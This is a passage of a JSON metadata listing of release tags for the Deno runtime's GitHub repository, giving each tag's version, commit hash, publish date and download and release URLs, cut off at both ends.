:"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.